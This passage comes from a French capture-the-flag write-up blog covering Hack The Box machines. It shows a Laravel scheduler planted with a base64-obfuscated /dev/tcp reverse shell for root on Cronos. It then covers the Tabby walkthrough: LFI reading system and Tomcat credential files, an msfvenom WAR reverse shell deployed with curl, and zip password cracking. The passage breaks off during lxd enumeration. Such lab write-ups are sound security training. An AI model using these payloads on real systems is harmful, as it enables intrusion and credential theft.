</span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@cronos:/var/www/laravel/app/Console$ head Kernel.php -n100 </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">namespace App<span class="se">\C</span>onsole<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">use Illuminate<span class="se">\C</span>onsole<span class="se">\S</span>cheduling<span class="se">\S</span>chedule<span class="p">;</span> </span></span><span class="line"><span class="cl">use Illuminate<span class="se">\F</span>oundation<span class="se">\C</span>onsole<span class="se">\K</span>ernel as ConsoleKernel<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">class Kernel extends ConsoleKernel </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> /** </span></span><span class="line"><span class="cl"> * The Artisan commands provided by your application. </span></span><span class="line"><span class="cl"> * </span></span><span class="line"><span class="cl"> * @var array </span></span><span class="line"><span class="cl"> */ </span></span><span class="line"><span class="cl"> protected <span class="nv">$commands</span> <span class="o">=</span> <span class="o">[</span> </span></span><span class="line"><span class="cl"> // </span></span><span class="line"><span class="cl"> <span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /** </span></span><span class="line"><span class="cl"> * Define the application<span class="s1">&#39;s command schedule. </span></span></span><span class="line"><span class="cl"><span class="s1"> * </span></span></span><span class="line"><span class="cl"><span class="s1"> * @param \Illuminate\Console\Scheduling\Schedule $schedule </span></span></span><span class="line"><span class="cl"><span class="s1"> * @return void </span></span></span><span class="line"><span class="cl"><span class="s1"> */ </span></span></span><span class="line"><span class="cl"><span class="s1"> protected function schedule(Schedule $schedule) </span></span></span><span class="line"><span class="cl"><span class="s1"> { </span></span></span><span class="line"><span class="cl"><span class="s1"> $schedule-&gt;exec(&#39;</span><span class="nb">echo</span> c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMiAwPiYx <span class="p">|</span> base64 -d <span class="p">|</span> bash<span class="s1">&#39;)-&gt;everyMinute(); </span></span></span><span class="line"><span class="cl"><span class="s1"> // $schedule-&gt;command(&#39;</span>inspire<span class="s1">&#39;) </span></span></span><span class="line"><span class="cl"><span class="s1"> // -&gt;hourly(); </span></span></span><span class="line"><span class="cl"><span class="s1"> } </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> /** </span></span></span><span class="line"><span class="cl"><span class="s1"> * Register the Closure based commands for the application. </span></span></span><span class="line"><span class="cl"><span class="s1"> * </span></span></span><span class="line"><span class="cl"><span class="s1"> * @return void </span></span></span><span class="line"><span class="cl"><span class="s1"> */ </span></span></span><span class="line"><span class="cl"><span class="s1"> protected function commands() </span></span></span><span class="line"><span class="cl"><span class="s1"> { </span></span></span><span class="line"><span class="cl"><span class="s1"> require base_path(&#39;</span>routes/console.php<span class="err">&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Au bout d&rsquo;une minute, on reçoit bien un shell en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## nc -lnvp 9002 </span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9002 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9002 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13:38926. </span></span><span class="line"><span class="cl">sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">3c1c.....64e8 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours faire un <strong>sqlmap</strong> sur une page de login si on ne trouve rien ! Tester un &ldquo;&rsquo; or 1=1; &ndash;&rdquo; n&rsquo;est pas suffisant. Il y a bcp de sql injection que l&rsquo;on peut decouvrir avec SQLMAP&hellip;</li> </ul>https://leopoldabgn.github.io/writeups/p/tabby-htb/Mon, 05 May 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/tabby-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Tabby cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Tabby</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.194</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="system-info">System Info </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Ubuntu </span></span></code></pre></td></tr></table> </div> </div><h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">tomcat : <span class="nv">$3</span>cureP4s5w0rd123! </span></span><span class="line"><span class="cl">ash : admin@it </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -p- -An -T4 10.10.10.194 </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.2p1 Ubuntu <span class="m">4</span> <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Mega Hosting </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">8080/tcp open http Apache Tomcat </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Apache Tomcat </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="apache-tomcat---lfi">Apache Tomcat - LFI </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">http://megahosting.htb/news.php?file<span class="o">=</span>../../../../../../../../etc/passwd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;&lt;------------&gt;&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">messagebus:x:103:106::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">syslog:x:104:110::/home/syslog:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_apt:x:105:65534::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false </span></span><span class="line"><span class="cl">uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin </span></span><span class="line"><span class="cl">pollinate:x:110:1::/var/cache/pollinate:/bin/false </span></span><span class="line"><span class="cl">sshd:x:111:65534::/run/sshd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false </span></span><span class="line"><span class="cl">tomcat:x:997:997::/opt/tomcat:/bin/false </span></span><span class="line"><span class="cl">mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false </span></span><span class="line"><span class="cl">ash:x:1000:1000:clive:/home/ash:/bin/bash </span></span></code></pre></td></tr></table> </div> </div><h3 id="tomcat-credentials-using-lfi">Tomcat Credentials using LFI </h3><p>En utilisant la LFI sur le site web port 80, on peut retrouver les creds pour le serveur apache tomcat présent sur le port 8080:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /news.php?file<span class="o">=</span>../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------- </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">&#34;role1&#34;</span> <span class="nv">password</span><span class="o">=</span><span class="s2">&#34;&lt;must-be-changed&gt;&#34;</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">&#34;role1&#34;</span>/&gt; </span></span><span class="line"><span class="cl">--&gt; </span></span><span class="line"><span class="cl"> &lt;role <span class="nv">rolename</span><span class="o">=</span><span class="s2">&#34;admin-gui&#34;</span>/&gt; </span></span><span class="line"><span class="cl"> &lt;role <span class="nv">rolename</span><span class="o">=</span><span class="s2">&#34;manager-script&#34;</span>/&gt; </span></span><span class="line"><span class="cl"> &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">&#34;tomcat&#34;</span> <span class="nv">password</span><span class="o">=</span><span class="s2">&#34;</span><span class="nv">$3</span><span class="s2">cureP4s5w0rd123!&#34;</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">&#34;admin-gui,manager-script&#34;</span>/&gt; </span></span><span class="line"><span class="cl">&lt;/tomcat-users&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="upload-war-file">Upload War file </h3><p>On comprend que le role manager-script nous permet d&rsquo;utiliser l&rsquo;API tomcat pour pouvoir upload un shell. Habituellement on aurait plus utiliser la GUI pour le faire, mais il nous manquer le role manager-gui ! On peut tout de meme le faire donc avec manager-script mais uniquement avec l&rsquo;API, ce qu&rsquo;on fait ici avec un curl :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Tabby <span class="o">(</span>main*<span class="o">)</span> » msfvenom -p java/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.10 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f war -o shell.war </span></span><span class="line"><span class="cl">Payload size: <span class="m">13027</span> bytes </span></span><span class="line"><span class="cl">Final size of war file: <span class="m">13027</span> bytes </span></span><span class="line"><span class="cl">Saved as: shell.war </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Tabby <span class="o">(</span>main*<span class="o">)</span> » curl -X PUT -u <span class="s1">&#39;tomcat:$3cureP4s5w0rd123!&#39;</span> --upload-file shell.war <span class="s1">&#39;http://megahosting.htb:8080/manager/text/deploy?path=/shell&amp;update=true&#39;</span> </span></span><span class="line"><span class="cl">OK - Deployed application at context path <span class="o">[</span>/shell<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">~ » nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.194<span class="o">]</span> <span class="m">46720</span> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">tomcat </span></span></code></pre></td></tr></table> </div> </div><h3 id="ash-backup-file---user-flag">Ash backup file - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">» cat linpeas.out <span class="p">|</span> grep ash <span class="p">|</span> tail </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> ash ash <span class="m">8716</span> Jun <span class="m">16</span> <span class="m">2020</span> /var/www/html/files/16162020_backup.zip &lt;--------- HERE </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> root root <span class="m">220</span> Feb <span class="m">25</span> <span class="m">2020</span> /snap/core20/1081/etc/skel/.bash_logout </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> root root <span class="m">220</span> Feb <span class="m">25</span> <span class="m">2020</span> /etc/skel/.bash_logout </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> tomcat tomcat <span class="m">220</span> Feb <span class="m">25</span> <span class="m">2020</span> /opt/tomcat/.bash_logout </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Sur kali</span> </span></span><span class="line"><span class="cl">$ zip2john 16162020_backup.zip &gt; hash.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ john --format<span class="o">=</span>PKZIP hash.txt --wordlist<span class="o">=</span>/usr/share/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>PKZIP <span class="o">[</span>32/64<span class="o">])</span> </span></span><span class="line"><span class="cl">Will run <span class="m">12</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">admin@it <span class="o">(</span>16162020_backup.zip<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:01 DONE <span class="o">(</span>2025-05-05 19:03<span class="o">)</span> 0.9615g/s 9972Kp/s 9972Kc/s 9972KC/s adzlogan..adamsapple:<span class="o">)</span><span class="m">1</span> </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed. </span></span></code></pre></td></tr></table> </div> </div><p>On peut utiliser ce mot de passe pour elever nos privilèges vers l&rsquo;utilisateur <strong>ash</strong>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">tomcat@tabby:/home$ </span></span><span class="line"><span class="cl">tomcat@tabby:/home$ su ash </span></span><span class="line"><span class="cl">Password: admin@it </span></span><span class="line"><span class="cl">ash@tabby:/home$ whoami </span></span><span class="line"><span class="cl">ash </span></span><span class="line"><span class="cl">ash@tabby:/home$ <span class="nb">cd</span> ash/ </span></span><span class="line"><span class="cl">ash@tabby:~$ cat user.txt </span></span><span class="line"><span class="cl">fb78.....79f6 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ash---ssh-connexion">Ash - SSH connexion </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ash@tabby:~/.ssh$ ssh-keygen </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">ash@tabby:~/.ssh$ ls </span></span><span class="line"><span class="cl">authorized_keys id_rsa id_rsa.pub </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">» ssh ash@10.10.10.194 -i ash.key <span class="c1"># &lt;-- avec la clé privée</span> </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04 LTS <span class="o">(</span>GNU/Linux 5.4.0-31-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">..... </span></span><span class="line"><span class="cl">Last login: Tue May <span class="m">19</span> 11:48:00 <span class="m">2020</span> </span></span><span class="line"><span class="cl">ash@tabby:~$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-1">Enumeration </h3><p>On remarque de ash fait parti du groupe lxd et que lxd tourne sur la machine. ChatGPT m&rsquo;a indiqué la possibilité d&rsquo;une exploit avec lxd.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ </span></span><span class="line"><span class="cl"> ╚════════════════════════════════════════════════╝ </span></span><span class="line"><span class="cl">╔══════════╣ Running processes <span class="o">(</span>cleaned<span class="o">)</span> </span></span><span class="line"><span class="cl">╚ Check weird <span class="p">&amp;</span> unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes </span></span><span class="line"><span class="cl">root <span class="m">81608</span> 0.0 0.0 <span class="m">2488</span> <span class="m">588</span> ? S 17:18 0:00 _ bpfilter_umh </span></span><span class="line"><span class="cl">root <span class="m">1</span> 0.0 0.5 <span class="m">104124</span> <span class="m">11460</span> ? Ss 11:11 0:01 /sbin/init maybe-ubiquity </span></span><span class="line"><span class="cl">root <span class="m">510</span> 0.0 1.8 <span class="m">92596</span> <span class="m">37716</span> ? S&lt;s 11:11 0:03 /lib/systemd/systemd-journald </span></span><span class="line"><span class="cl">root <span class="m">537</span> 0.0 0.2 <span class="m">21748</span> <span class="m">5884</span> ? Ss 11:11 0:00 /lib/systemd/systemd-udevd </span></span><span class="line"><span class="cl">root <span class="m">677</span> 0.0 0.9 <span class="m">411432</span> <span class="m">18380</span> ? SLsl 11:11 0:05 /sbin/multipathd -d -s </span></span><span class="line"><span class="cl">systemd+ <span class="m">711</span> 0.0 0.6 <span class="m">24312</span> <span class="m">13280</span> ? Ss 11:11 0:01 /lib/systemd/systemd-resolved </span></span><span class="line"><span class="cl">systemd+ <span class="m">712</span> 0.0 0.3 <span class="m">90388</span> <span class="m">6392</span> ? Ssl 11:11 0:01 /lib/systemd/systemd-timesyncd </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000002000000</span><span class="o">=</span>cap_sys_time </span></span><span class="line"><span class="cl">root <span class="m">722</span> 0.0 0.5 <span class="m">47524</span> <span class="m">10376</span> ? Ss 11:11 0:00 /usr/bin/VGAuthService </span></span><span class="line"><span class="cl">root <span class="m">723</span> 0.0 0.3 <span class="m">162004</span> <span class="m">7860</span> ? S&lt;sl 11:11 0:12 /usr/bin/vmtoolsd </span></span><span class="line"><span class="cl">root <span class="m">847</span> 0.0 0.3 <span class="m">235548</span> 